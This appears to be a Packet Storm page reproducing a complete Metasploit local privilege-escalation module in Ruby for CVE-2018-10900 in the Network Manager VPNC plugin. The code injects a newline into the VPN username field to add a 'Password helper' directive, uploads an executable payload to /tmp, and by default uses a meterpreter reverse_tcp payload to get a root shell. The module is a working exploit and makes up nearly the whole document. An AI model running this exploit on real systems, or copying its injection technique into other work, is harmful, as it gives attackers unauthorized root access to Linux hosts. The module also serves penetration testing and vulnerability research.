Network Manager VPNC Username Privilege Escalation

2018-08-3100:00:00
Brendan Coles
packetstormsecurity.com
EPSS
0.004
Percentile
72.5%
JSON
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = ExcellentRanking  
  
include Msf::Post::File  
include Msf::Post::Linux::Priv  
include Msf::Post::Linux::System  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Network Manager VPNC Username Privilege Escalation',  
'Description' => %q{  
This module exploits an injection vulnerability in the Network Manager  
VPNC plugin to gain root privileges.  
  
This module uses a new line injection vulnerability in the configured  
username for a VPN network connection to inject a `Password helper`  
configuration directive into the connection configuration.  
  
The specified helper is executed by Network Manager as root when the  
connection is started.  
  
Network Manager VPNC versions prior to 1.2.6 are vulnerable.  
  
This module has been tested successfully with VPNC versions:  
1.2.4-4 on Debian 9.0.0 (x64); and  
1.1.93-1 on Ubuntu Linux 16.04.4 (x64).  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Denis Andzakovic', # Discovery and exploit  
'Brendan Coles' # Metasploit  
],  
'DisclosureDate' => 'Jul 26 2018',  
'References' =>  
[  
['CVE', '2018-10900'],  
['URL', 'http://seclists.org/oss-sec/2018/q3/51'],  
['URL', 'https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc'],  
['URL', 'https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4'],  
['URL', 'https://security-tracker.debian.org/tracker/CVE-2018-10900'],  
['URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-10900.html'],  
['URL', 'https://launchpad.net/ubuntu/+source/network-manager-vpnc/0.9.8.6-1ubuntu2.1'],  
['URL', 'https://www.debian.org/security/2018/dsa-4253'],  
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1605919'],  
['URL', 'https://bugzilla.novell.com/show_bug.cgi?id=1101147']  
],  
'Platform' => 'linux',  
'Arch' => [ARCH_X86, ARCH_X64],  
'SessionTypes' => ['shell', 'meterpreter'],  
'Targets' => [['Auto', {}]],  
'DefaultOptions' =>  
{  
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',  
'WfsDelay' => 10,  
'PrependFork' => true  
},  
'DefaultTarget' => 0))  
register_options [  
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])  
]  
end  
  
def base_dir  
datastore['WritableDir'].to_s  
end  
  
def upload(path, data)  
print_status "Writing '#{path}' (#{data.size} bytes) ..."  
rm_f path  
write_file path, data  
register_file_for_cleanup path  
end  
  
def upload_and_chmodx(path, data)  
upload path, data  
cmd_exec "chmod +x '#{path}'"  
end  
  
def check  
unless command_exists? 'nmcli'  
vprint_error 'Network Manager nmcli utility is not installed'  
return CheckCode::Safe  
end  
vprint_good 'nmcli utility is installed'  
  
CheckCode::Detected  
end  
  
def exploit  
if is_root?  
fail_with Failure::BadConfig, 'Session already has root privileges'  
end  
  
if check != CheckCode::Detected  
fail_with Failure::NotVulnerable, 'Target is not vulnerable'  
end  
  
@payload_name = ".#{rand_text_alphanumeric rand(10..15)}"  
payload_path = "#{base_dir}/#{@payload_name}"  
  
print_status 'Adding VPN connection...'  
vpn_data = []  
vpn_data << '+vpn.data "IKE DH Group = dh2"'  
vpn_data << "+vpn.data 'IPSec ID = #{rand_text_alphanumeric 5..10}'"  
vpn_data << '+vpn.data "IPSec gateway = 127.0.0.1"'  
vpn_data << '+vpn.data "IPSec secret-flags = 4"'  
vpn_data << '+vpn.data "Local Port = 0"'  
vpn_data << '+vpn.data "NAT Traversal Mode = natt"'  
vpn_data << '+vpn.data "Perfect Forward Secrecy = server"'  
vpn_data << '+vpn.data "Vendor = cisco"'  
vpn_data << '+vpn.data "Xauth password-flags = 4"'  
vpn_data << "+vpn.data \"Xauth username = #{rand_text_alphanumeric 5..10}\nPassword helper #{payload_path}\""  
vpn_data << "+vpn.data 'ipsec-secret-type = #{rand_text_alphanumeric 5..10}'"  
vpn_data << "+vpn.data 'xauth-password-type = #{rand_text_alphanumeric 5..10}'"  
res = cmd_exec "nmcli connection add con-name #{@payload_name} type vpn ifname '*' vpn-type vpnc -- #{vpn_data.join(' ')}"  
if res.include? 'Error'  
fail_with Failure::Unknown, 'Could not create VPN connection'  
end  
  
res = cmd_exec 'nmcli connection'  
unless res.include? @payload_name  
fail_with Failure::Unknown, 'Could not create VPN connection'  
end  
  
print_status 'Uploading payload...'  
upload_and_chmodx payload_path, generate_payload_exe  
  
print_status 'Starting VPN connection...'  
cmd_exec "nmcli connection up #{@payload_name} & echo "  
end  
  
def cleanup  
print_status 'Removing VPN connection...'  
res = cmd_exec "nmcli connection delete #{@payload_name}"  
unless res.include? 'successfully deleted'  
print_warning "Could not remove VPN connection #{@payload_name}"  
end  
super  
end  
end  
`